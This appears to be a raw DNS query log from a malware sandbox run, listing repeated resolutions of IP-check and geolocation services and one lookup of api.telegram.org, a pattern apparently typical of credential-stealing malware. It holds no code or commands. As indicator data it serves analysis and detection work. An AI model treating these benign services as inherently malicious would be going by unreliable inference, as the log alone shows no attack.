                                    Aug 13, 2024 20:24:57.126260042 CEST8.8.8.8192.168.2.220x96d5No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.479684114 CEST8.8.8.8192.168.2.220xb8c1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.479684114 CEST8.8.8.8192.168.2.220xb8c1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.479684114 CEST8.8.8.8192.168.2.220xb8c1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.479684114 CEST8.8.8.8192.168.2.220xb8c1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.479684114 CEST8.8.8.8192.168.2.220xb8c1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.479684114 CEST8.8.8.8192.168.2.220xb8c1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.489085913 CEST8.8.8.8192.168.2.220xe3c7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.489085913 CEST8.8.8.8192.168.2.220xe3c7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.489085913 CEST8.8.8.8192.168.2.220xe3c7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.489085913 CEST8.8.8.8192.168.2.220xe3c7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.489085913 CEST8.8.8.8192.168.2.220xe3c7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.489085913 CEST8.8.8.8192.168.2.220xe3c7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.622107029 CEST8.8.8.8192.168.2.220xd009No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.622107029 CEST8.8.8.8192.168.2.220xd009No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.622107029 CEST8.8.8.8192.168.2.220xd009No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.622107029 CEST8.8.8.8192.168.2.220xd009No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.622107029 CEST8.8.8.8192.168.2.220xd009No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.622107029 CEST8.8.8.8192.168.2.220xd009No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.635576010 CEST8.8.8.8192.168.2.220x6585No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.635576010 CEST8.8.8.8192.168.2.220x6585No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.635576010 CEST8.8.8.8192.168.2.220x6585No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.635576010 CEST8.8.8.8192.168.2.220x6585No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.635576010 CEST8.8.8.8192.168.2.220x6585No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:58.635576010 CEST8.8.8.8192.168.2.220x6585No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.196753979 CEST8.8.8.8192.168.2.220xd396No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.196753979 CEST8.8.8.8192.168.2.220xd396No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.209474087 CEST8.8.8.8192.168.2.220xd396No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.209474087 CEST8.8.8.8192.168.2.220xd396No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.656183958 CEST8.8.8.8192.168.2.220xb953No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.656183958 CEST8.8.8.8192.168.2.220xb953No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.992712021 CEST8.8.8.8192.168.2.220xb80aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.992712021 CEST8.8.8.8192.168.2.220xb80aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.992712021 CEST8.8.8.8192.168.2.220xb80aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.992712021 CEST8.8.8.8192.168.2.220xb80aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.992712021 CEST8.8.8.8192.168.2.220xb80aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:24:59.992712021 CEST8.8.8.8192.168.2.220xb80aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:00.005518913 CEST8.8.8.8192.168.2.220x8ad2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:00.005518913 CEST8.8.8.8192.168.2.220x8ad2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:00.005518913 CEST8.8.8.8192.168.2.220x8ad2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:00.005518913 CEST8.8.8.8192.168.2.220x8ad2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:00.005518913 CEST8.8.8.8192.168.2.220x8ad2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:00.005518913 CEST8.8.8.8192.168.2.220x8ad2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.031306982 CEST8.8.8.8192.168.2.220xe089No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.031306982 CEST8.8.8.8192.168.2.220xe089No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.031306982 CEST8.8.8.8192.168.2.220xe089No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.031306982 CEST8.8.8.8192.168.2.220xe089No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.031306982 CEST8.8.8.8192.168.2.220xe089No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.031306982 CEST8.8.8.8192.168.2.220xe089No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.040117979 CEST8.8.8.8192.168.2.220x6844No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.040117979 CEST8.8.8.8192.168.2.220x6844No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.040117979 CEST8.8.8.8192.168.2.220x6844No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.040117979 CEST8.8.8.8192.168.2.220x6844No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.040117979 CEST8.8.8.8192.168.2.220x6844No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:02.040117979 CEST8.8.8.8192.168.2.220x6844No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:03.682820082 CEST8.8.8.8192.168.2.220xa411No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:03.682820082 CEST8.8.8.8192.168.2.220xa411No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.368171930 CEST8.8.8.8192.168.2.220x3e24No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.368171930 CEST8.8.8.8192.168.2.220x3e24No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.368171930 CEST8.8.8.8192.168.2.220x3e24No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.368171930 CEST8.8.8.8192.168.2.220x3e24No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.368171930 CEST8.8.8.8192.168.2.220x3e24No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.368171930 CEST8.8.8.8192.168.2.220x3e24No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.378217936 CEST8.8.8.8192.168.2.220xc961No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.378217936 CEST8.8.8.8192.168.2.220xc961No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.378217936 CEST8.8.8.8192.168.2.220xc961No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.378217936 CEST8.8.8.8192.168.2.220xc961No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.378217936 CEST8.8.8.8192.168.2.220xc961No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:04.378217936 CEST8.8.8.8192.168.2.220xc961No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:13.252530098 CEST8.8.8.8192.168.2.220x371No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:13.252530098 CEST8.8.8.8192.168.2.220x371No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.569797039 CEST8.8.8.8192.168.2.220x483No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.569797039 CEST8.8.8.8192.168.2.220x483No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.569797039 CEST8.8.8.8192.168.2.220x483No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.569797039 CEST8.8.8.8192.168.2.220x483No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.569797039 CEST8.8.8.8192.168.2.220x483No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.569797039 CEST8.8.8.8192.168.2.220x483No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.581427097 CEST8.8.8.8192.168.2.220x2bfcNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.581427097 CEST8.8.8.8192.168.2.220x2bfcNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.581427097 CEST8.8.8.8192.168.2.220x2bfcNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.581427097 CEST8.8.8.8192.168.2.220x2bfcNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.581427097 CEST8.8.8.8192.168.2.220x2bfcNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:14.581427097 CEST8.8.8.8192.168.2.220x2bfcNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:16.772885084 CEST8.8.8.8192.168.2.220xe937No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:16.772885084 CEST8.8.8.8192.168.2.220xe937No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.380386114 CEST8.8.8.8192.168.2.220xefd7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.380386114 CEST8.8.8.8192.168.2.220xefd7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.380386114 CEST8.8.8.8192.168.2.220xefd7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.380386114 CEST8.8.8.8192.168.2.220xefd7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.380386114 CEST8.8.8.8192.168.2.220xefd7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.380386114 CEST8.8.8.8192.168.2.220xefd7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.390116930 CEST8.8.8.8192.168.2.220x935No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.390116930 CEST8.8.8.8192.168.2.220x935No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.390116930 CEST8.8.8.8192.168.2.220x935No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.390116930 CEST8.8.8.8192.168.2.220x935No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.390116930 CEST8.8.8.8192.168.2.220x935No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:18.390116930 CEST8.8.8.8192.168.2.220x935No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.222822905 CEST8.8.8.8192.168.2.220xd529No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.222822905 CEST8.8.8.8192.168.2.220xd529No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.964683056 CEST8.8.8.8192.168.2.220xe96No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.964683056 CEST8.8.8.8192.168.2.220xe96No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.964683056 CEST8.8.8.8192.168.2.220xe96No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.964683056 CEST8.8.8.8192.168.2.220xe96No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.964683056 CEST8.8.8.8192.168.2.220xe96No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.964683056 CEST8.8.8.8192.168.2.220xe96No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.976974010 CEST8.8.8.8192.168.2.220x29c3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.976974010 CEST8.8.8.8192.168.2.220x29c3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.976974010 CEST8.8.8.8192.168.2.220x29c3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.976974010 CEST8.8.8.8192.168.2.220x29c3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.976974010 CEST8.8.8.8192.168.2.220x29c3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:19.976974010 CEST8.8.8.8192.168.2.220x29c3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:20.684335947 CEST8.8.8.8192.168.2.220x4138No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:20.684335947 CEST8.8.8.8192.168.2.220x4138No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.339663982 CEST8.8.8.8192.168.2.220x4e22No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.339663982 CEST8.8.8.8192.168.2.220x4e22No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.339663982 CEST8.8.8.8192.168.2.220x4e22No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.339663982 CEST8.8.8.8192.168.2.220x4e22No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.339663982 CEST8.8.8.8192.168.2.220x4e22No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.339663982 CEST8.8.8.8192.168.2.220x4e22No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.349638939 CEST8.8.8.8192.168.2.220x2d0eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.349638939 CEST8.8.8.8192.168.2.220x2d0eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.349638939 CEST8.8.8.8192.168.2.220x2d0eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.349638939 CEST8.8.8.8192.168.2.220x2d0eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.349638939 CEST8.8.8.8192.168.2.220x2d0eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:21.349638939 CEST8.8.8.8192.168.2.220x2d0eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.776124954 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.776124954 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.776124954 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.776124954 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.776124954 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.776124954 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.783272982 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.783272982 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.783272982 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.783272982 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.783272982 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.783272982 CEST8.8.8.8192.168.2.220xe327No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.798034906 CEST8.8.8.8192.168.2.220x9028No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.798034906 CEST8.8.8.8192.168.2.220x9028No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.798034906 CEST8.8.8.8192.168.2.220x9028No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.798034906 CEST8.8.8.8192.168.2.220x9028No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.798034906 CEST8.8.8.8192.168.2.220x9028No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:25.798034906 CEST8.8.8.8192.168.2.220x9028No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.266258955 CEST8.8.8.8192.168.2.220x8b59No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.266258955 CEST8.8.8.8192.168.2.220x8b59No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.917874098 CEST8.8.8.8192.168.2.220xdb14No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.917874098 CEST8.8.8.8192.168.2.220xdb14No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.917874098 CEST8.8.8.8192.168.2.220xdb14No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.917874098 CEST8.8.8.8192.168.2.220xdb14No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.917874098 CEST8.8.8.8192.168.2.220xdb14No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.917874098 CEST8.8.8.8192.168.2.220xdb14No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.927016973 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.927016973 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.927016973 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.927016973 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.927016973 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.927016973 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.937124014 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.937124014 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.937124014 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.937124014 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.937124014 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:26.937124014 CEST8.8.8.8192.168.2.220x40c5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:30.800631046 CEST8.8.8.8192.168.2.220x6010No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:30.800631046 CEST8.8.8.8192.168.2.220x6010No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:31.908525944 CEST8.8.8.8192.168.2.220x9ed0No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:31.908525944 CEST8.8.8.8192.168.2.220x9ed0No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.526880026 CEST8.8.8.8192.168.2.220xb987No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.639823914 CEST8.8.8.8192.168.2.220x7ab0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.639823914 CEST8.8.8.8192.168.2.220x7ab0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.639823914 CEST8.8.8.8192.168.2.220x7ab0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.639823914 CEST8.8.8.8192.168.2.220x7ab0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.639823914 CEST8.8.8.8192.168.2.220x7ab0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.639823914 CEST8.8.8.8192.168.2.220x7ab0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.650755882 CEST8.8.8.8192.168.2.220xc204No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.650755882 CEST8.8.8.8192.168.2.220xc204No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.650755882 CEST8.8.8.8192.168.2.220xc204No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.650755882 CEST8.8.8.8192.168.2.220xc204No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.650755882 CEST8.8.8.8192.168.2.220xc204No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                    Aug 13, 2024 20:25:32.650755882 CEST8.8.8.8192.168.2.220xc204No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
